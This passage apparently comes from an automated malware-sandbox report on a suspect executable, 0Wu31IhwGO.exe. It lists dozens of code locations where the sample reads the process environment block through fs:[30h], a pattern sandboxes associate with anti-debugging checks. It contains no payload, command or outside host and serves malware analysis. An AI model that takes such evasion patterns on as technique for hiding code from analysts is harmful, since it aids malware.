                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134C427 mov eax, dword ptr fs:[00000030h]4_2_0134C427
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A456 mov eax, dword ptr fs:[00000030h]4_2_0140A456
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137A470 mov eax, dword ptr fs:[00000030h]4_2_0137A470
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC460 mov ecx, dword ptr fs:[00000030h]4_2_013DC460
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134645D mov eax, dword ptr fs:[00000030h]4_2_0134645D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137245A mov eax, dword ptr fs:[00000030h]4_2_0137245A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138E443 mov eax, dword ptr fs:[00000030h]4_2_0138E443
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013844B0 mov ecx, dword ptr fs:[00000030h]4_2_013844B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DA4B0 mov eax, dword ptr fs:[00000030h]4_2_013DA4B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013564AB mov eax, dword ptr fs:[00000030h]4_2_013564AB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013504E5 mov ecx, dword ptr fs:[00000030h]4_2_013504E5
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0140A49A mov eax, dword ptr fs:[00000030h]4_2_0140A49A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov ecx, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138273C mov eax, dword ptr fs:[00000030h]4_2_0138273C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CC730 mov eax, dword ptr fs:[00000030h]4_2_013CC730
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C720 mov eax, dword ptr fs:[00000030h]4_2_0138C720
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350710 mov eax, dword ptr fs:[00000030h]4_2_01350710
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01380710 mov eax, dword ptr fs:[00000030h]4_2_01380710
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C700 mov eax, dword ptr fs:[00000030h]4_2_0138C700
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358770 mov eax, dword ptr fs:[00000030h]4_2_01358770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360770 mov eax, dword ptr fs:[00000030h]4_2_01360770
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE75D mov eax, dword ptr fs:[00000030h]4_2_013DE75D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350750 mov eax, dword ptr fs:[00000030h]4_2_01350750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D4755 mov eax, dword ptr fs:[00000030h]4_2_013D4755
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392750 mov eax, dword ptr fs:[00000030h]4_2_01392750
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov esi, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138674D mov eax, dword ptr fs:[00000030h]4_2_0138674D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013507AF mov eax, dword ptr fs:[00000030h]4_2_013507AF
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F678E mov eax, dword ptr fs:[00000030h]4_2_013F678E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013547FB mov eax, dword ptr fs:[00000030h]4_2_013547FB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013727ED mov eax, dword ptr fs:[00000030h]4_2_013727ED
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE7E1 mov eax, dword ptr fs:[00000030h]4_2_013DE7E1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_014047A0 mov eax, dword ptr fs:[00000030h]4_2_014047A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135C7C0 mov eax, dword ptr fs:[00000030h]4_2_0135C7C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D07C3 mov eax, dword ptr fs:[00000030h]4_2_013D07C3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136E627 mov eax, dword ptr fs:[00000030h]4_2_0136E627
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01386620 mov eax, dword ptr fs:[00000030h]4_2_01386620
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01388620 mov eax, dword ptr fs:[00000030h]4_2_01388620
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135262C mov eax, dword ptr fs:[00000030h]4_2_0135262C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01392619 mov eax, dword ptr fs:[00000030h]4_2_01392619
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141866E mov eax, dword ptr fs:[00000030h]4_2_0141866E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE609 mov eax, dword ptr fs:[00000030h]4_2_013CE609
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01382674 mov eax, dword ptr fs:[00000030h]4_2_01382674
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A660 mov eax, dword ptr fs:[00000030h]4_2_0138A660
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0136C640 mov eax, dword ptr fs:[00000030h]4_2_0136C640
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013866B0 mov eax, dword ptr fs:[00000030h]4_2_013866B0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C6A6 mov eax, dword ptr fs:[00000030h]4_2_0138C6A6
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354690 mov eax, dword ptr fs:[00000030h]4_2_01354690
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D06F1 mov eax, dword ptr fs:[00000030h]4_2_013D06F1
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE6F2 mov eax, dword ptr fs:[00000030h]4_2_013CE6F2
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A6C7 mov eax, dword ptr fs:[00000030h]4_2_0138A6C7
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E892B mov eax, dword ptr fs:[00000030h]4_2_013E892B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D892A mov eax, dword ptr fs:[00000030h]4_2_013D892A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01348918 mov eax, dword ptr fs:[00000030h]4_2_01348918
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC912 mov eax, dword ptr fs:[00000030h]4_2_013DC912
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CE908 mov eax, dword ptr fs:[00000030h]4_2_013CE908
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC97C mov eax, dword ptr fs:[00000030h]4_2_013DC97C
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F4978 mov eax, dword ptr fs:[00000030h]4_2_013F4978
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01376962 mov eax, dword ptr fs:[00000030h]4_2_01376962
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov edx, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0139096E mov eax, dword ptr fs:[00000030h]4_2_0139096E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D0946 mov eax, dword ptr fs:[00000030h]4_2_013D0946
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov esi, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013D89B3 mov eax, dword ptr fs:[00000030h]4_2_013D89B3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141A9D3 mov eax, dword ptr fs:[00000030h]4_2_0141A9D3
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013629A0 mov eax, dword ptr fs:[00000030h]4_2_013629A0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013509AD mov eax, dword ptr fs:[00000030h]4_2_013509AD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013829F9 mov eax, dword ptr fs:[00000030h]4_2_013829F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE9E0 mov eax, dword ptr fs:[00000030h]4_2_013DE9E0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0135A9D0 mov eax, dword ptr fs:[00000030h]4_2_0135A9D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013849D0 mov eax, dword ptr fs:[00000030h]4_2_013849D0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E69C0 mov eax, dword ptr fs:[00000030h]4_2_013E69C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov ecx, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01372835 mov eax, dword ptr fs:[00000030h]4_2_01372835
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]4_2_013F483A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F483A mov eax, dword ptr fs:[00000030h]4_2_013F483A
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138A830 mov eax, dword ptr fs:[00000030h]4_2_0138A830
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC810 mov eax, dword ptr fs:[00000030h]4_2_013DC810
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]4_2_013E6870
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6870 mov eax, dword ptr fs:[00000030h]4_2_013E6870
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]4_2_013DE872
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DE872 mov eax, dword ptr fs:[00000030h]4_2_013DE872
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01380854 mov eax, dword ptr fs:[00000030h]4_2_01380854
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]4_2_01354859
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01354859 mov eax, dword ptr fs:[00000030h]4_2_01354859
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01362840 mov ecx, dword ptr fs:[00000030h]4_2_01362840
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DC89D mov eax, dword ptr fs:[00000030h]4_2_013DC89D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141A8E4 mov eax, dword ptr fs:[00000030h]4_2_0141A8E4
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350887 mov eax, dword ptr fs:[00000030h]4_2_01350887
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]4_2_0138C8F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0138C8F9 mov eax, dword ptr fs:[00000030h]4_2_0138C8F9
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137E8C0 mov eax, dword ptr fs:[00000030h]4_2_0137E8C0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0141AB40 mov eax, dword ptr fs:[00000030h]4_2_0141AB40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01404B4B mov eax, dword ptr fs:[00000030h]4_2_01404B4B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01404B4B mov eax, dword ptr fs:[00000030h]4_2_01404B4B
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]4_2_0137EB20
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137EB20 mov eax, dword ptr fs:[00000030h]4_2_0137EB20
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013CEB1D mov eax, dword ptr fs:[00000030h]4_2_013CEB1D
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0134CB7E mov eax, dword ptr fs:[00000030h]4_2_0134CB7E
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]4_2_01418B28
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01418B28 mov eax, dword ptr fs:[00000030h]4_2_01418B28
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FEB50 mov eax, dword ptr fs:[00000030h]4_2_013FEB50
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013F8B42 mov eax, dword ptr fs:[00000030h]4_2_013F8B42
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]4_2_013E6B40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013E6B40 mov eax, dword ptr fs:[00000030h]4_2_013E6B40
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]4_2_01360BBE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01360BBE mov eax, dword ptr fs:[00000030h]4_2_01360BBE
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01358BF0 mov eax, dword ptr fs:[00000030h]4_2_01358BF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_0137EBFC mov eax, dword ptr fs:[00000030h]4_2_0137EBFC
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013DCBF0 mov eax, dword ptr fs:[00000030h]4_2_013DCBF0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_013FEBD0 mov eax, dword ptr fs:[00000030h]4_2_013FEBD0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01404BB0 mov eax, dword ptr fs:[00000030h]4_2_01404BB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01404BB0 mov eax, dword ptr fs:[00000030h]4_2_01404BB0
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01350BCD mov eax, dword ptr fs:[00000030h]4_2_01350BCD
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
                Source: C:\Users\user\Desktop\0Wu31IhwGO.exeCode function: 4_2_01370BCB mov eax, dword ptr fs:[00000030h]4_2_01370BCB
